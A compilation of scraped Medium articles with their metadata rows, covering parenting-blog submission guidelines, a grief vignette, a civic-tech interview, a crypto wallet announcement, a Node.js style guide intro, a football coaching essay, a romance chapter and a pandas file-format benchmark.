Special Needs
Education — note that this needs to come from a parenting or family angle. There are other publications specifically for pieces on education.
Mental Health — note that this needs to come from a parenting or family angle. There are other publications specifically for pieces on mental health.
If your piece is in response to the monthly prompt, please include the tag “prompt”.
We pride ourselves on being a publication where readers and writers feel supported. Parents often feel judged and most of our readers are parents. Please make sure your work isn’t of a judging or shaming nature. The sort of articles we accept are:
Well-written with limited spelling mistakes and grammatical errors. We understand it’s easy to miss things in your own writing (especially if you are distracted by parenting duties) so one or two errors are fine. But we expect you to proofread your own work before you submit.
Have something to teach the reader. We don’t accept drafts that are like diary entries. You need to write for the reader. Is your piece relatable? And if it’s about a unique issue, does it have valuable knowledge to give the reader? Is there an actionable takeaway message?
Are specific to parenting and family. We do not accept drafts that have nothing to do with these topics.
Have links to sources. Some articles may not need these, but if you are stating a point such as “children benefit from their parents reading to them” then you need to find a source to back that up.
Have specific titles that tell the reader exactly what the article is about. People are less likely to click on vague titles such as “Divorce.” A better title would be “How Divorce Has Impacted My Family.”
We do not accept poetry.
Please allow up to 48 hours for your draft to be published, pending any changes an editor asks you to make. This does not include weekends. The editors for this publication are Laura Fox, David Fox, and Mason Sabre. If any changes need to be made to your draft, we will leave private notes explaining how you can make them.
We have a section on our homepage called “Best of” where we select the best articles of the month. If you would like to read examples of articles that fit our publication, we recommend you browse that section.
As always, follow Medium’s Curation Guidelines when submitting your work.
How to Submit
If you would like to write for us, please send a link to an unpublished draft to laurafoxwriter@gmail.com. We do not accept pieces that are already published.
Please allow up to seven days for your draft to be reviewed.
If your draft is of good quality and fits our publication, we will add you as a writer. This means you can add your Medium drafts to our publication and we will publish them for you, pending any changes you need to make.
If you have any questions that have not been answered in our FAQ section, please comment below and we will happily answer them.
We are looking forward to reading your stories! | https://medium.com/home-sweet-home/how-to-write-for-home-sweet-home-b2795076d783 | ['Laura Fox'] | 2020-10-02 12:25:06.696000+00:00 | ['Submission Guidelines'] |
Memories Spent and Memories Lost | If I stand in the balcony of our old house, I can still see the empty swing swinging slightly in the breeze. If I close my eyes, I can see a grandfather sitting in the swing, his grandchild squeezed behind him, pretending to be the master of the boat guiding it through tumultuous waters.
Oh, how much I wish the child knew their way now!
Evening falls, the blowing of a conch shell is heard. Warm air with a hint of burning incense stick wafts up to my nose. It’s the time I await eagerly, to talk to the grandmother next door while she washes the clothes.
But she doesn’t come. Not anymore.
Now she’s in her room, locked in a place unreachable to man, staring at the buzzing tv with a faraway look, waiting for the day to join her already dead son.
The sky darkens, and I think I can see the familiar white hair blowing in the wind, the all-too-known toothless smile.
Until I blink.
And she’s gone.
The road buzzes with people, children crowd to the phuchka vendor. The radio in the laundry shop across the street cackles and plays an old Bollywood song. Sound of chow mein sizzling on the pan.
Everything is the same. And everything isn’t.
The damp smell of the earth warns of impending rain.
People hurry for shelter. But I welcome it. I wonder if it smelled the same back in Bangladesh, back when Dadai used to go to school on rainy days in a boat. Did he ever look up at the rain falling down from the sky and think of the people in his life? Look back at moments spent?
I accompany Dadai on his evening walk when he comes to visit us. He points out to me the houses of people he knew. People who were his people from home. I look at the dark shacks, the people living there mostly gone. I see his eyes dreaming of days past, of memories spent and memories lost.
I stop in front of a pond. The black water stands still, like time. Two coconut trees stand at the edge of the water, their leaves brushing each other as they lean down to the surface — two friends watching the play of time.
The wind is quiet, unlike my mind which is rushing, roaring like moving waters today. It is taking me to places, memories I wanted to forget. Pain — the pain of losing people stings at the back of my mind like saltwater on a wound.
A lump forms in my throat. My chest burns with the memory of my loved ones, of people met and people lost. I wonder if the river feels the same?
Meeting friends, changing forms, only to leave them and move along —
I close my eyes. The cloud rumbles overhead. The river in me longs to take its form and flow, flow like unrestrained waters from the hills like it’s meant to be —
It’s drizzling now, the cold raindrops kissing my face like the warmth of my long-gone friends.
I walk up to the last step of the ghat and kneel to the water level. Carefully taking out a paper boat from my pocket, I caress it, remembering the times I used to sail paper boats in the rain, before floating it in the water.
The tiny boat flutters and shakes, the wind taking it away from me. | https://medium.com/prismnpen/memories-spent-and-memories-lost-f9232a969f66 | ['Artemis Shishir'] | 2020-09-26 08:17:08.844000+00:00 | ['Fiction', 'Memories', 'Loss', 'LGBTQ', 'Grief'] |
Showcase 2019: Delivering digital at a national scale with Daniel Tse | The Code for Canada Showcase is a celebration of civic tech in Canada. What does civic tech mean to you?
We’re in an age where it’s no longer a question of “can technology do this?” Today, more and more, what we have is technology in search of problems. Civic tech is an opportunity to find real problems and solve them with technology in an inclusive manner.
How does the theme of civic tech or the values of the civic tech movement relate to your work?
Something I’ve learned at the Canadian Digital Service is that two heads are better than one. One of the things our team embraced while working with Veterans Affairs Canada was to pair up developers and non-developers to build things together. This not only helped build a more inclusive product, but helped the team develop more empathy for each other. At its core, civic tech brings people (both tech and non-tech) together to solve problems.
What’s unique about civic tech and digital government in Canada? Are there unique opportunities? Unique challenges?
Canada is geographically large and comes with a huge diversity of cultures, which can be a challenge or an opportunity when you’re developing products and services intended to be accessible for all Canadians from your first release. Typically, in startups or private industry you’re told to niche down, pick a really small, tiny slice of your target market. In the government your niche automatically starts with two languages and accessibility requirements. So, you can view the Official Languages Act and accessibility as a challenge — but I like to view it as a call to action and an opportunity to be inclusive from the start.
“You can view the Official Languages Act and accessibility as a challenge — but I like to view it as a call to action and an opportunity to be inclusive from the start.”
The Showcase brings together public servants, entrepreneurs, community organizers and residents under the banner of civic tech. From your perspective, why is it important to get people from across sectors in the same room?
If we believe modern day problems require modern day solutions, then inclusive problems require inclusive teams. We cannot continue to solve things in isolation. The risk of focusing on the wrong thing, or repeating the same mistakes increases exponentially when we don’t work as an inclusive team.
What are you most excited about for the Showcase this year?
As a former fellow, I’m looking forward to seeing how the momentum is building. It’s so interesting to see how some of the challenges that we faced as the inaugural fellows are now solved on day one for today’s fellows. I’m also just really excited to see the creative things they’ve built to address new and different public service challenges. | https://medium.com/code-for-canada/showcase-2019-delivering-digital-at-a-national-scale-with-daniel-tse-4bf55f20bb6d | ['Luke Simcoe'] | 2019-07-11 17:31:02.787000+00:00 | ['Showcase', 'Code For Canada', 'Digital Government', 'Civictech'] |
LAMB Chrome extension wallet will release soon | The first chrome extension wallet to support Lambda storage network. Google Chrome is the most popular browser nowadays, and it has powerful plugin system. The plugin wallet configuration is simple, installation and layout are very simple and convenient. At the same time, many blockchain applications currently have plugin wallets support. Hence, the Lambda Chrome extension wallet will be convenience for users and opened up Lambda ecological transactions and blueprint.
The Lambda Wallet Chrome extension brings the overall Lambda ecosystem experience to web users. It is a natural web entry point into the blockchain space, and it fills a gap on the web side of the Lambda ecosystem. A web wallet will also be an indispensable, fundamental tool for blockchain applications. In the future, Lambda will continue to improve the wallet's functionality and user experience. We welcome all Lambda community members to bring their friends to try the beta version of the Lambda Chrome extension wallet and to share their suggestions with us!
The LAMB Chrome extension wallet, created by the Lambda technology community, will be launched soon. Please follow our Weibo and other official channels.
Node.js Coding Style Guidelines | Node.js Coding Style Guidelines
Make your code readable to others
Software developers are like lone wolves who prefer to work as individuals rather than in a group. I too fall into that category. This can sometimes create problems when the need to work in groups arises in a project.
There are both pros and cons involved when working in groups. On the plus side, there are more insights available to a problem which can help get to a better solution, but at the same time there can be collaboration issues when one developer has to go through another developer’s code to debug or review it.
Each individual has his/her own way of writing code and more often than not, there is a high degree of variation among a group of developers. To avoid such problems when working in a team, most of the programming language communities follow standard coding guidelines. By following these guidelines every developer can write code in a specific way that is known to their teammates. This practice can help teams save time reading the code written by other members.
This article is a guide for writing consistent and aesthetically pleasing Node.js code. It is inspired by what is popular within the community, and also features some personal opinions. | https://medium.com/swlh/node-js-coding-style-guidelines-74a20d00c40b | ['Tarun Gupta'] | 2020-12-25 14:44:42.530000+00:00 | ['JavaScript', 'Programming Tips', 'Nodejs', 'Programming', 'Javascript Tips'] |
Introducing Havas Emerge | Introducing Havas Emerge
As part of our North America Commit to Change Plan, this week we are proud to announce Havas Emerge, a new program that brings together 27 diverse, emerging leaders from Havas NA agencies. The 9-month, 3-module learning and development program is designed to accelerate the early careers of Asian, Black, Hispanic, Indigenous, and other non-white ethnicities — with the goal to increase representation in management roles across Havas’ North American agencies.
The inaugural class is comprised of leaders from all 3 Havas Group networks, 21 agencies, 8 cities, and 14 departments. Through the program, they will gain an understanding of their own leadership, inspiration from thought leaders, a development plan to guide their career, and a community to grow along with.
Meet the first class: | https://medium.com/havas-all-in/introducing-havas-emerge-73f4ed39236d | ['Havas Group'] | 2020-12-09 22:33:53.201000+00:00 | ['Training And Development', 'Management And Leadership', 'Empowerment Program', 'Diversity And Inclusion', 'Management Development'] |
Does Firing Your Football Coach Lead to Success? We Don’t Think So. | There is an old adage that states head coaches are hired to be fired, and a vast majority of the time, this is true. In the NFL over the past couple of decades, the average tenure of a head coach has been 3.3 years. According to Business Insider, that average is higher among FBS college football head coaches, but not by much (3.8 years).
Another way to examine coaching turnover is to calculate how many NFL and FBS head coaching changes are made each year. The following table shows data from the last 10 NFL seasons.
We see that there have been 65 coaching changes during this time period, an average of 6.5 per year, which equates to 20.3 percent head coaching turnover each season.
We now turn our attention to the same data for FBS college football.
We see that there have been 241 coaching changes during this time period, an average of 24.1 per year, which equates to 18.5 percent head coaching turnover each season.
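The turnover arithmetic behind both tables above is simple enough to sanity-check with a few lines of Python. This is a throwaway sketch, not part of the original analysis; it assumes 32 NFL teams and 130 FBS teams as the denominators:

```python
def turnover_rate(total_changes: int, years: int, num_teams: int):
    """Return (average changes per year, turnover as a percent of all head-coach jobs)."""
    per_year = total_changes / years
    return per_year, per_year / num_teams * 100

# Figures taken directly from the tables in this article
nfl_per_year, nfl_rate = turnover_rate(65, 10, 32)     # 6.5 per year, ~20.3%
fbs_per_year, fbs_rate = turnover_rate(241, 10, 130)   # 24.1 per year, ~18.5%

print(f"NFL: {nfl_per_year} changes/year, {nfl_rate:.1f}% turnover")
print(f"FBS: {fbs_per_year} changes/year, {fbs_rate:.1f}% turnover")
```

The two leagues land within about two percentage points of each other, which is why the article treats head-coaching churn as a football-wide pattern rather than an NFL-only one.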
For both professional and college football, that is a significant amount of head coaching turnover. The question is: how successful have these changes been?
First, let’s take a look at the NFL. Since the average head coaching tenure is 3.3 years, we’ve examined all the head coaches over the past decade who had a tenure of 3 years or less, and compared their record to the record of their successor over the same period of time.
Green indicates the successor had a higher winning percentage, red indicates the successor had a lower winning percentage.
At first glance, these results look pretty good. There are 38 coaching changes in our table, and 23 of those moves (60.5%) resulted in improvement. However, a closer look reveals something quite different.
When a team makes a head coaching change, they are not looking to take a team with a losing record and improve it to a slightly better losing record. Of the 23 “improvements” noted in our table, 13 of those coaches still had a losing (or even) record over the same number of years that their predecessor was given.
If we consider a successful coaching change, one that results in a winning record (and a better record than the previous coach), only 10 (26.3%) of these qualify.
The following table includes data for FBS college football teams. The teams listed here made the most coaching changes over the past 10–15 years, and the chart includes coaches with a tenure of 5 years or less.
Note: there were a number of schools not included here that experienced as many or more coaching changes than the schools listed in the chart, but those were typically smaller programs that had a consistent pattern of losing head coaches to larger programs, so those changes can be ignored for the purposes of this study.
Of the 23 coaching changes listed here, 12 of them (52.2%) resulted in improvement. However, much like the NFL data above, that percentage drops significantly if we use the “winning record” criteria described previously.
Only 6 (26.1%) of the FBS coaching changes resulted in a better record than the previous coach, and a winning record.
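Under the stricter bar of "better record than the previous coach AND a winning record," the success rates quoted above work out as follows. Again, this is a throwaway Python sketch using only the counts stated in this article:

```python
def success_rate(successes: int, total_changes: int) -> float:
    """Percent of coaching changes that cleared the 'improved AND winning record' bar."""
    return successes / total_changes * 100

# Counts taken from the NFL and FBS tables discussed above
nfl_success = success_rate(10, 38)  # ~26.3%
fbs_success = success_rate(6, 23)   # ~26.1%

print(f"NFL: {nfl_success:.1f}% of changes succeeded")
print(f"FBS: {fbs_success:.1f}% of changes succeeded")
```

Roughly one change in four clears the bar in either league, which motivates the article's next question about why teams keep firing coaches so quickly.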
The fact that so few head coaching changes result in a winning record and improvement over the previous regime points to some serious issues in the pro and college football hiring process. So we ask the question, why are football coaches fired so quickly over and over if the data says that’s wrong?
Coaches are completely aware of the fact that performance is everything; if they don’t produce, they will be fired. And, they probably won’t be given very many years to prove themselves as we have seen from the data.
This cycle produces what we call a ‘culture of fear’ in the coaching profession that no other industry deals with on a daily basis. Coaches know they are on a short leash from the day they are hired, and this lack of job security and peace of mind creates tremendous pressure and anxiety among head football coaches.
So we ask, is mental health important for NFL and college football coaches?
The numbers suggest that the current system of hiring and firing is not working.
The initial step is to hire the right person to begin with — more specifically, hire head coaches for the right reasons. Too often coaches are hired for reasons outside of what the right ‘fit’ for the organization might be.
A stellar win-loss record, a family history of coaching success, a history with successful teams and/or coaches, and personal or professional connections are all criteria currently used in the hiring of coaches.
Is this right?
Having won elsewhere, having the right last name, having been an assistant coach under a great head coach or for a great team, or having a comfort level with someone because you’ve worked with them before are not always good indicators of how successful a head coaching hire will be. Even something as obvious as past success can be misleading if not thoroughly investigated and taken into account with many other factors.
Hiring the right head coach is not an exact science by any means, but the process is made even more difficult by using criteria that is often more beneficial for public relations or self serving to the administration (Ie., selling the hire to a fan base or to boosters) or networking (working with your friends in the profession) than it is for producing on the field.
So why doesn’t the administration have more patience?
The data shows that having a revolving door of head coaches does not lead to future success. If you believe in the head coach you hired because he was brought in for the right reasons, why are schools giving up on them because there are some bumps in the road in the first, second, or even third year? There is an old quote that “business is bad news, but if you can deal with the bad news each and every day, you’ll have success in business.”
We all know that professional and college football is definitely big business, but it seems like so many times today, organizations and college athletic departments just run from the so-called bad news instead of working through it and assuring each other of their full support.
So what if administrators thought differently? What if professional and collegiate football coaches knew they were not going to be dismissed if they didn't win right away? What if the culture of fear wasn't in play and 'psychological safety' was instilled by the administration? Many global case studies show people are much more likely to do what it takes to build a team/program the right way, rather than focusing on shortcuts that might bring the team quicker success but not necessarily sustained success.
There have been a number of situations where NFL teams or college programs have chosen a head coaching candidate they believed in (who perhaps wasn’t a traditional or popular hire at the time), then stayed the course when things became tough.
The Pittsburgh Steelers have only had three head coaches in the last 51 years. The first coach in that trio, Chuck Noll, began his tenure in Pittsburgh with a 12–30 record during his first three years at the helm.
That is the kind of record that will typically get a coach sent to the unemployment line. But, despite that rough start, the Steelers kept their faith in Noll, who rewarded them with a dominant run that featured four Super Bowl victories (1975, 1976, 1979, 1980).
Bill Cowher was the next head coach of the Steelers, but unlike Noll, he got off to a fast start. However, in the middle of his run in Pittsburgh, he ran into some difficulties, going 22–26 from 1998–2000.
The team decided to stay the course, and Cowher turned things around quickly, leading to a great deal of further success and a Super Bowl victory in 2006.
Pittsburgh’s next and current coach, Mike Tomlin, also got off to a great start, winning the Super Bowl in 2009 in only his second year with the team.
But, much like his predecessor, his team hit a snag after a few years and posted back-to-back 8–8 records in 2012–13. As they are prone to do, the organization remained firm in their support of their head coach, and he bounced back with a 45–19 record over the next four seasons.
The New England Patriots are an example of an NFL franchise that made a hire that went very much against the standard hiring trends, and it paid off big-time.
When the Patriots hired Bill Belichick to be their head coach in 2000, his only previous head coaching experience in the NFL was his five years with the Cleveland Browns from 1991–95.
Belichick compiled a 36–44 record in Cleveland, but despite that, New England took a leap of faith, handing not only the head coaching duties to Belichick but nearly complete control of the team’s football operations — a very bold move given Belichick’s failure in his previous head coaching stint.
The result of this decision is legendary; Bill Belichick has established himself as arguably the most successful head coach in NFL history, appearing in nine Super Bowls, winning six.
The Patriots organization thought they saw something in a coach who had a losing record in his previous head coaching stop, and they chose to take the public relations hit because they believed in his ability to get the job done in New England.
The Minnesota Vikings are a team that has had among the lowest head coaching turnover in the NFL over the last several decades. In 1967, the Vikings hired Canadian Football League coach Bud Grant to lead their team.
Grant didn’t fare too well early on, going 11–14 during his first two seasons. However, things started to click in Year 3, and Grant went on to guide his team to four Super Bowl appearances in the ’70s, including a run of three out of four during the span 1974–77.
There are also many great examples of unusual hires and patience paying off in the college ranks…one of those is Kirk Ferentz at Iowa.
Ferentz was the head coach at the University of Maine from 1990–92, posting a rather poor 12–21 record. Hiring someone with this head coaching background is a hard sell to fans and boosters, but Iowa had confidence they found the right man for the job.
Things didn’t begin well at all for Ferentz at Iowa, as he compiled a 4–19 record in his first two years. It would have been easy to hit the eject button on Ferentz at this point, but the university did not.
Kirk Ferentz has gone on to a long and illustrious career leading the Hawkeyes program, winning three conference titles and appearing in a whopping 17 postseason Bowl games.
Texas Christian University (TCU) has shown patience with their head coach through several down periods, and that loyalty has been rewarded with a stellar 20-year run for the Horned Frogs football program.
TCU has had tremendous success under head coach Gary Patterson, who has elevated the team from a middling Division I program to one that many would consider a national power.
Despite Patterson’s outstanding record with the Horned Frogs, he has encountered some down years from time to time. The team dropped to 5–6 in 2004, only to rebound to 11–1 the next season.
By current TCU standards, the 8–5 season of 2007 was not a good one, but an 11–2 result followed in 2008. The team posted a two-year record of 11–14 in 2012–13, but again, came back very strong in 2014 (12–1).
2016 saw the Horned Frogs dip to 6–7, but an 11–3 mark followed the next season. Clearly, Patterson’s tenure in Fort Worth has had its ups and downs, but the school has remained steadfast in its support of Gary Patterson.
Pulling the plug on Patterson after a rough year or two, as some schools might have done, would have also potentially erased the most successful seasons in school history (11–1, 12–1, 13–0, 12–1), all of which came after these brief lulls.
For our final illustration from the college ranks, we’ll move to the Clemson Tigers. Dabo Swinney was named interim head coach of the team after Tommy Bowden’s resignation midway through the 2008 season.
Swinney posted a pedestrian 4–3 record for the remainder of 2008. Clemson supporters wanted the administration to hire a big-name head coach or at the very least a prominent assistant with previous head coaching experience.
The university decided to offer Dabo Swinney the head coaching position, which was a very unpopular decision among Tigers faithful. He had never been more than a position coach other than his seven games as Clemson’s interim head coach, and those results were not impressive.
As Swinney’s tenure began at Clemson, the masses who were so against the hire felt vindicated. Dabo Swinney’s teams went 19–15 in his first three years, a rather poor showing by Clemson standards.
But, the school stuck with their embattled head coach, and an incredible run of eight conference championships and two national championships began.
Making a quality hire based on what an organization believes is the right 'fit' is essential, no matter where the candidate has coached in the past or what his last name is. Hiring is hard, but 'fit' is something that needs to be explored more. Making million-dollar hiring decisions based on 'one-year wonders' or on who will win the press conference is proving more and more to be wrong. And trust us, we are the first to know that having patience with your chosen coach doesn't guarantee that your team will win a Super Bowl or a College Football Playoff National Championship. But history, and the data included in this article, certainly show that working through troubled times together, and getting better at your working relationship with your hire, can maximize your odds of success.
And that’s what successful decision-making in sports is all about. | https://medium.com/@chadqbrown/does-firing-your-football-coach-lead-to-success-we-dont-think-so-916292fcfea2 | ['Chad Q Brown'] | 2020-12-25 19:07:23.850000+00:00 | ['Firing', 'Hiring', 'Personality Tests', 'College Athletics', 'Firing Employees'] |
An Efft-Up Love Story | Chapter 4
Photo by Matthew T Rader on Unsplash
‘Are you nervous?’ ‘Should I be?’ ‘Turn left at the stop,’ Alison directs. ‘Well, my dad is a bit difficult.’ ‘Difficult?’ ‘Uh huh. My sister’s husband didn’t have it easy,’ Alison says and presses her lips. Lucious looks at Alison and takes her hand. ‘He’ll see that his baby girl has a real man,’ Lucious brags. Alison laughs at his confidence. She is nervous.
Her father was not impressed with the first boyfriend she brought home after her Matric year, maybe because he was not Christian.
‘The house with the black gate.’ Lucious exhales loudly. He parks in front of the gate. ‘Mommy, please open the gate.’
She looks at Lucious as they walk towards the front door. He holds her hand. To his surprise, she lets go of his hand the moment the front door opens.
‘My child!’ ‘Hello mommy,’ Alison greets her mom and introduces Lucious. ‘This is Lucious, my…’ ‘Pleased to meet you Lucious,’ she shakes his hand. ‘Pleased to meet you aunt Faith,’ he says confidently. ‘How was the road? I was telling your father, you should’ve come sooner, because the road will be very busy today.’ ‘It was very busy, but we didn’t have a choice but to leave today.’ ‘Kennith, the kids are here.’ Aunt Faith looks nervous, speaking more properly and nicely than usual! They walk to the tv room where Alison’s dad’s sitting. ‘My girl! How’s daddy’s girl?’ They hug. ‘Hello daddy! I’m good thank you.’ She turns and looks at Lucious. ‘This is Lucious. Lucious this is my dad, Kennith.’ ‘Pleasure to meet you, sir.’ Her dad shakes his hand and nods awkwardly. ‘Sit,’ aunt Faith says and looks at Lucious. ‘Anyone for tea? Or cold drink?’
Alison joins her mom in the kitchen to prepare drinks. She leaves Lucious in the tv room with her father. After serving cold drinks her mom enters with a plate. ‘My mom’s Melting Moments, you have to try them!’ she says trying to break the ice.
‘So, what do you do for a living Lucious?’ Uncle Kennith asks. ‘I own a hardware store,’ he answers confidently. Uncle Kennith looks confused. ‘I inherited it from my grandfather.’ ‘Oh!’ uncle Kennith answers quickly. ‘Where?’ Aunty Faith asks. ‘In Jo’burg.’ ‘It’s quite big now hey?’ Alison adds. ‘Yes, I extended the building two years ago.’ ‘There must be a lot of hardware stores around Jo’burg,’ uncle Kennith says concerned and unimpressed. It’s getting awkward. Alison gets up. ‘Let’s get the bags.’ They walk out and her parents remain sitting.
‘What’s your dad implying?’ ‘Nothing. He’s just trying to get to know you.’ Lucious doesn’t look happy.
They spend the afternoon with her parents until some of her aunties and cousins come over. They start cooking for Christmas lunch tomorrow. Aunty Faith makes her famous dessert, Trifle.
Lucious hangs out with Alison’s cousins. They brought a few drinks, they’re drinking secretly in the front yard. Every time uncle Kennith comes out to check on them or make random conversation, they hide their glasses underneath their chairs.
Alison is doing her hair and spending time with the aunties in the kitchen. She goes to Lucious every now and then so that he doesn’t complain about being neglected later on.
It’s almost 12:00, and the cousins are gathering outside. Lucious is far beyond tipsy. He doesn’t see Alison. He wants Alison. He wants her next to him.
He looks for her in the kitchen, but finds only aunties and the smell of ginger beer. Uncle Kennith, his suspicious stare and his brother-in-law are sitting in the tv room. ‘Alison!’ Lucious calls. He hears her voice down the hallway in one of the rooms. ‘Oh, here you are.’ She looks up at him. She’s sitting on the bed with her cousin. ‘Oh no,’ she says softly. ‘What?’ he asks obliviously. ‘It’s almost midnight. Let’s go outside,’ her cousin proposes and leaves the room. After she leaves Lucious closes the door behind her and falls on the bed next to Alison. He tries to kiss her. She pulls away, jumps up and looks terrified. ‘What are you doing?’ she whispers and opens the door. Lucious, looking very confused, asks ‘What’s up with you? Why can’t I kiss you?’ ‘Anyone can walk in.’ For a moment he is distracted by the noise her family makes outside. They hear hooters and people shouting, ‘Merry Christmas!’ He looks at her, quickly gets up, shuts the door and presses her against the door. ‘Merry Christmas baby,’ he says, smiles and kisses her. She lets go of all her concerns and indulges in it. His mouth is warm. She tastes whiskey. She actually loves this moment, having him all over her in her parents’ house. She puts her hands under his t-shirt, grabs his lower back and squeezes her body against his…
There’s a knock on the window. They stop kissing. She didn’t close the curtain yet! They freeze and she hides behind him. ‘Shit,’ she whispers and puts off the light. ‘Who was that?’ Lucious asks. ‘It could be anyone,’ she says and opens the door. Alison is annoyed. Lucious is too drunk to give a damn!
Alison feels too awkward to go outside. She tries to pull herself together and go out hoping it was one of her silly cousins knocking. Lucious walks carelessly behind her. They start wishing the people as they go, waiting for someone to say something about what just happened. No one looks guilty or upset until she sees her dad standing next to his brother-in-law, right in front of her room’s window. Her energy drops to her heels. Her inner self jumps up and down and buries her head underground!
She is reluctant to go to her dad and uncle to wish them a merry Christmas. Lucious, on the other hand, walks over to them. Alison holds her breath and analyses her dad’s reaction. ‘He looks…upset,’ she thinks. Lucious stands and converses with them. ‘You have guts…’ she says softly while walking towards them. Her dad looks at her, they kiss and hug. It was him.
She is not like Lucious, she leaves immediately. Lucious forces conversation with her dad and uncle until her cousin’s husband calls him.
The sky is colourful and sparkling as the rockets whirl across the sky. The whole neighbourhood is celebrating. Alison and her family are gazing at the beautiful view. ‘It’s the Abrahams. They spend roughly R6000 on fireworks every festive season,’ Alison hears her dad telling her uncle.
After a while all the old people go into the house for tea and biscuits. The young people are doing what they do best, drinking undercover. The people start to leave. Alison and Lucious greet the last people and walk back into the house. ‘Can I have some of you?’ Lucious asks and kisses her neck while locking the door. ‘No,’ she whispers and giggles. ‘You scared we gonna wake your parents?’ he mocks. ‘Lucious stop it,’ she whispers and tries to steer clear of him while walking down the hallway. She goes to the bathroom. When she comes back she finds Lucious lying on her bed. She panics. ‘You’re sleeping in the guest room.’ ‘Why?’ Alison pauses. ‘Where are you sleeping?’ ‘Here, in my room,’ she says. ‘Are you telling me that we are going to sleep apart?’ Alison presses her lips and nods. Lucious is agitated. ‘My parents won’t allow…’ Lucious gets up, ‘If I knew this I would’ve rather partied on.’ He leaves the room and Alison feels stupid.
Alison gets up early. She didn’t get much sleep after her boyfriend went to bed without saying good night. She makes him breakfast. When he wakes, he looks happy to see her. He pulls her closer, holds her and sleeps a while longer. She wiggles herself from his grip and wakes him.
Christmas lunch is the best, there’s always enough food for an army. The tables are packed with various drinks, snacks and desserts. Alison loves the family time and the yummy food but the amount of dishes waiting is enough to send her back to Jo’burg right now!
The young ladies sort out the kitchen. Some of the old people rest their eyes while the young ones chill outside. ‘I would give anything to just take a nap next to you right now,’ Lucious whispers. ‘I know, me too.’ ‘Will it be wrong of me to ask you to leave tomorrow?’ ‘On Boxing day? No, we can’t.’ Lucious sighs.
Late afternoon everyone leaves and the house is quiet. Alison and Lucious join her parents in front of the tv. ‘Your sister says the kids had a blast on the beach today,’ aunty Faith says to break the silence. Lucious takes part in the conversation until aunty Faith excuses herself. Her parents go to bed early. They finally have some alone time, they snuggle up and watch a movie. A few hours later Lucious starts kissing Alison. She gives in for two reasons. One, before he puts her in the car and rushes back to Jo’burg. And two, she wants to.
They stay for two more days. Lucious is okay with that now, as long as they can watch late night movies…
They leave for Jo’burg and Lucious is not bothered about uncle Kennith’s obvious dislike of him. | https://medium.com/@fakycm/an-efft-up-love-story-723d3004b0a9 | ['Faren M'] | 2020-10-07 10:01:24.449000+00:00 | ['Attraction', 'Lovestory', 'Family Traditions', 'Romance', 'Romance Novels'] |
The Best Format to Save Pandas Data | The Best Format to Save Pandas Data
A small comparison of various ways to serialize a pandas data frame to the persistent storage
When working on data analytical projects, I usually use Jupyter notebooks and a great pandas library to process and move my data around. It is a very straightforward process for moderate-sized datasets which you can store as plain-text files without too much overhead.
However, when the number of observations in your dataset is high, the process of saving and loading data back into the memory becomes slower, and now each kernel’s restart steals your time and forces you to wait until the data reloads. So eventually, the CSV files or any other plain-text formats lose their attractiveness.
We can do better. There are plenty of binary formats to store the data on disk, and pandas supports many of them. How can we know which one is better for our purposes? Well, we can try a few of them and compare! That’s what I decided to do in this post: go through several methods to save pandas.DataFrame onto disk and see which one is better in terms of I/O speed, consumed memory and disk space. I’m going to show the results of my little benchmark below.
Photo by Patrick Lindenberg on Unsplash
Formats to Compare
We’re going to consider the following formats to store our data.
Plain-text CSV — a good old friend of a data scientist
Pickle — a Python’s way to serialize things
MessagePack — it’s like JSON but fast and small
HDF5 — a file format designed to store and organize large amounts of data
Feather — a fast, lightweight, and easy-to-use binary file format for storing data frames
Parquet — an Apache Hadoop’s columnar storage format
All of them are very widely used and (except MessagePack maybe) very often encountered when you’re doing some data analytical stuff.
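For orientation, each of these formats maps to a paired `to_*`/`read_*` method on a data frame. Here is a minimal round-trip sketch for the two dependency-free formats, with the other methods listed in comments (their availability varies across pandas versions, and feather/parquet additionally need `pyarrow`):

```python
import os
import tempfile

import pandas as pd

df = pd.DataFrame({"a": [1, 2, 3], "b": ["x", "y", "z"]})

with tempfile.TemporaryDirectory() as tmp:
    # Plain-text CSV -- always available, human-readable
    csv_path = os.path.join(tmp, "frame.csv")
    df.to_csv(csv_path, index=False)
    from_csv = pd.read_csv(csv_path)

    # Pickle -- Python's own binary serialization, also dependency-free
    pkl_path = os.path.join(tmp, "frame.pkl")
    df.to_pickle(pkl_path)
    from_pickle = pd.read_pickle(pkl_path)

# The other formats follow the same to_*/read_* pattern but need optional
# dependencies (pyarrow, tables) and vary across pandas versions:
#   df.to_hdf(path, key="df")  / pd.read_hdf(path, "df")
#   df.to_feather(path)        / pd.read_feather(path)
#   df.to_parquet(path)        / pd.read_parquet(path)
# (to_msgpack existed up to pandas 0.25 and was removed in pandas 1.0.)

print(from_pickle.equals(df))  # True -- pickle round-trips dtypes exactly
```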
Chosen Metrics
Pursuing the goal of finding the best buffer format to store the data between notebook sessions, I chose the following metrics for comparison.
size_mb — the size of the file (in Mb) with the serialized data frame
save_time — an amount of time required to save a data frame onto a disk
load_time — an amount of time needed to load the previously dumped data frame into memory
save_ram_delta_mb — the maximal memory consumption growth during a data frame saving process
load_ram_delta_mb — the maximal memory consumption growth during a data frame loading process
Note that the last two metrics become very important when we use the efficiently compressed binary data formats, like Parquet. They could help us to estimate the amount of RAM required to load the serialized data, in addition to the data size itself. We’ll talk about this question in more detail in the next sections.
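As a rough illustration of how the first three metrics could be collected — the function and its arguments below are my own stand-ins, not the benchmark’s actual code, and the RAM-delta metrics would need an extra tool such as `memory_profiler`, so they are omitted:

```python
import os
import tempfile
import time

import pandas as pd


def benchmark_format(df, save_fn, load_fn, suffix):
    """Time one save/load round trip and report the file size in MB.

    save_fn and load_fn are caller-supplied wrappers, e.g.
    lambda d, p: d.to_pickle(p) paired with pd.read_pickle.
    """
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "frame" + suffix)

        start = time.perf_counter()
        save_fn(df, path)
        save_time = time.perf_counter() - start

        size_mb = os.path.getsize(path) / 1024 ** 2

        start = time.perf_counter()
        load_fn(path)
        load_time = time.perf_counter() - start

    return {"size_mb": size_mb, "save_time": save_time, "load_time": load_time}


df = pd.DataFrame({"x": range(1000), "y": ["cat"] * 1000})
stats = benchmark_format(df, lambda d, p: d.to_pickle(p), pd.read_pickle, ".pkl")
print(sorted(stats))  # ['load_time', 'save_time', 'size_mb']
```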
The Benchmark
I decided to use a synthetic dataset for my tests to have better control over the serialized data structure and properties. Also, I use two different approaches in my benchmark: (a) keeping generated categorical variables as strings and (b) converting them into pandas.Categorical data type before performing any I/O.
The function generate_dataset shows how I was generating the datasets in my benchmark.
